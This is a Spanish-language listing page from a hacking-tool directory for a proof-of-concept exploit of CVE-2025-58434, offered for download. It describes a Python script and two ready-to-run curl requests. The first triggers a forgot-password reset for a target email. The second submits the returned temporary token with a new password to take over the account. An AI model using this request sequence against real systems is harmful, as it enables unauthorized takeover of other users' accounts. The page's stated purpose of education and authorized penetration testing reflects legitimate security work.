Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-58434-PoC — CVE-2025-58434 Prueba de concepto | Kitploit
Herramientas/GitHubGitHub/mananispiwpiw/cve-2025-58434-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubmananispiwpiw/cve-2025-58434-poc

CVE-2025-58434-PoC

CVE-2025-58434 Prueba de concepto

Ver Repositorio
hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PoC de CVE-2025-58434

Script de prueba de concepto en Python para activar POST /api/v1/account/forgot-password.

⚠️ Solo con fines educativos e investigación de seguridad autorizada. Ejecutar esta herramienta contra sistemas que no posees o sin permiso por escrito para probar es ilegal.

Créditos

  • zaddy6 (Isaac David)
  • arthurgervais (Arthur Gervais)

Detalles

  • PoC para CVE-2025-58434
  • Referencia: https://github.com/advisories/GHSA-wgpv-6j63-x5ph

Archivos

  • poc.py: solicita la URL/IP de la máquina, protocolo opcional cuando se usa solo host/IP, correo electrónico objetivo y contraseña; luego envía la solicitud e imprime el estado HTTP, encabezados y cuerpo de la respuesta similar a curl -i

Uso

Ejecutar:

root@kitploit:~
python3 poc.py

Luego proporcione:

  • URL/IP de la máquina, como 10.10.11.10, http://10.10.11.10 o https://target.example
  • protocolo si se solicita para host/IP simple
  • dirección de correo electrónico
  • contraseña

Comando curl equivalente

Primera solicitud

root@kitploit:~
curl -i -X POST https://<MACHINE_URL/IP>/api/v1/account/forgot-password \
  -H "Content-Type: application/json" \
  -d '{"user":{"email":"<[email protected]>"}}'

Segunda solicitud

root@kitploit:~
curl -i -X POST https://<target>/api/v1/account/reset-password \
  -H "Content-Type: application/json" \
  -d '{
        "user":{
          "email":"<[email protected]>",
          "tempToken":"<tempToken>",
          "password":"NewSecurePassword123!"
        }
      }'
Descargar herramienta